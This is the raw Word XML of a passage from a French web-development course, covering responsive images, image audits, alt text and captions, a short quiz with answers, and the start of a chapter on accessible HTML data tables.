        <w:t>Exercice 6.2 — Construire un média adaptatif</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Vous disposez d'une image de 1600 × 900 pixels utilisée en bandeau.</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Générez trois tailles et deux formats.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 xml:space="preserve">Écrivez la balise </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>srcset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sizes</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Expliquez quel fichier sera chargé sur un téléphone de 390 pixels de large.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 6.3 — Auditer une page média</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ANALYSE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Choisissez une page d'accueil riche en images.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Relevez le poids total des images et la plus lourde.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 xml:space="preserve">Vérifiez la présence des attributs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>alt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>loading</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Proposez trois corrections chiffrées.</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6.1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&lt;figure&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;img src="images/atelier-1.webp"</w:t>
        <w:br/>
        <w:t xml:space="preserve">       alt="Groupe de six apprenants devant un écran de code."</w:t>
        <w:br/>
        <w:t xml:space="preserve">       width="1200" height="800" loading="lazy"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;figcaption&gt;Première séance : découverte de l'éditeur.&lt;/figcaption&gt;</w:t>
        <w:br/>
        <w:t>&lt;/figure&gt;</w:t>
        <w:br/>
        <w:t>&lt;figure&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;img src="images/atelier-2.webp"</w:t>
        <w:br/>
        <w:t xml:space="preserve">       alt="Schéma du modèle de boîte dessiné au tableau."</w:t>
        <w:br/>
        <w:t xml:space="preserve">       width="1200" height="800" loading="lazy"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;figcaption&gt;Deuxième séance : le modèle de boîte.&lt;/figcaption&gt;</w:t>
        <w:br/>
        <w:t>&lt;/figure&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un bon </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>alt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> décrit ce qui est utile à comprendre : le nombre de personnes, l'action, le sujet. Il évite les détails décoratifs et les formules creuses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La légende (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>figcaption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) apporte un contexte différent : la date, le lieu, l'étape du cours. Elle ne remplace pas l'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>alt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, elle le complète.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 6.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>cwebp -q 80 -resize 800 0 hero.jpg -o hero-800.webp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, on produit des variantes de 480, 800 et 1600 pixels de large en WebP et en JPEG de repli.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>srcset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> liste les largeurs en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sizes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> indique que sur un écran de moins de 600 pixels, l'image occupe 100 % de la largeur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Sur un téléphone de 390 pixels, le navigateur choisit la variante de 480 pixels (la plus proche au-dessus de la largeur nécessaire). Avec un écran à densité double, il peut choisir 800 pixels pour rester net.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 6.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le panneau Réseau, filtré sur « Img », donne la taille transférée de chaque image et le total. Une page non optimisée dépasse souvent 3 Mo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Les manques les plus fréquents : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>alt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> absents sur les images décoratives (ils devraient être vides), dimensions absentes sur les vignettes, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lazy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> oublié sur les images situées en bas de page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Trois corrections typiques : conversion en WebP (-35 %), redimensionnement des vignettes (-60 % sur ces fichiers), ajout de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>loading="lazy"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur les vingt dernières images (suppression du téléchargement initial).</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 format privilégier pour un logo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JPEG</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PNG</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SVG</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GIF</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 xml:space="preserve">Que doit contenir l'attribut </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>alt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> d'une image purement décorative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Une description détaillée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Une chaîne vide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 nom du fichier</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Rien : l'attribut doit être absent</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 xml:space="preserve">À quoi servent les attributs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur une image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À imposer la taille finale en pixels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À réserver l'espace et éviter les décalages de mise en page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À accélérer le téléchargement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À activer le chargement différé</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Quel attribut retarde le chargement d'une image hors écran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defer</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async</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loading="lazy"</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preload</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Pourquoi les sous-titres d'une vidéo sont-ils indispensables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Pour améliorer le référencement uniquement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Pour rendre la vidéo accessible aux personnes sourdes et en environnement bruyant</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Pour réduire le poids de la vidéo</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Pour empêcher le téléchargement</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C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Un logo est un dessin de formes simples : le SVG reste net à toute taille et pèse généralement moins qu'un PNG équivalent.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>alt=""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> indique aux technologies d'assistance d'ignorer l'image. L'absence d'attribut, au contraire, laisse le lecteur d'écran annoncer le nom du fichier.</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Le navigateur en déduit le rapport d'aspect et réserve la place avant le chargement ; le CSS peut ensuite adapter la taille réelle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>loading="lazy"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est l'attribut natif de chargement différé des images et des iframes.</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Les sous-titres sont une exigence d'accessibilité et un confort d'usage : de nombreuses personnes regardent sans son.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>7. Tableaux de données</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Un tableau sert à croiser des données. Tout le reste n'est pas un tableau, et le confondre coûte cher.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 00 · Niveau : Débutant · Prérequis : chapitre 6</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Distinguer un tableau de données d'une mise en page tabulaire.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Construire un tableau accessible avec titre, en-têtes et portées.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Fusionner des cellules sans casser la lecture assistée.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Adapter un tableau large aux petits écrans.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Choisir entre tableau HTML, liste et composant CSS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>7.1 Un tableau, c'est des données croisées</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un tableau associe des valeurs à deux dimensions : des lignes et des colonnes. Un horaire de train, un comparatif de tarifs, un relevé de notes sont des tableaux. Une grille de cartes, une galerie, une mise en page à trois colonnes n'en sont pas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Pendant vingt ans, les tableaux ont servi à mettre en page. Cette époque est révolue : CSS Grid et Flexbox font cela mieux, et un lecteur d'écran annonce désormais « tableau de 12 lignes, 3 colonnes » à chaque mise en page mal placée, ce qui désoriente profondément.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2603500"/>
            <wp:docPr id="13" name="Picture 13"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f11.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2603500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.11 — Tableau ou grille ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>7.1.1 Ce qu'un lecteur d'écran annonce</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Face à un tableau, un lecteur d'écran peut annoncer la position et l'en-tête de la cellule courante : « ligne 3, colonne 2, tarif mensuel, 19 euros ». Cette restitution dépend entièrement de la qualité du balisage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Le tableau de référence : titre, en-têtes de colonnes et de lignes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 Annonce possible : « ligne 2, colonne 3, Prix, 19 € » --&gt;</w:t>
        <w:br/>
        <w:t>&lt;table&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;caption&gt;Tarifs des offres 2026&lt;/caption&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;thead&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="col"&gt;Offre&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="col"&gt;Stockage&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="col"&gt;Prix&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/thead&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;tbody&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="row"&gt;Essentiel&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;td&gt;10 Go&lt;/td&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;td&gt;4 €&lt;/td&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="row"&gt;Confort&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;td&gt;100 Go&lt;/td&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;td&gt;19 €&lt;/td&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/tbody&gt;</w:t>
        <w:br/>
        <w:t>&lt;/table&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.23 — Les éléments d'un tableau HTML et leur rôle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0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Élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Obligatoire</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>caption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3305"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Titre du tableau</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Fortement recommandé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="270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thead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Ligne(s) d'en-tête</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Oui pour les données</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>tbody</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3305"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
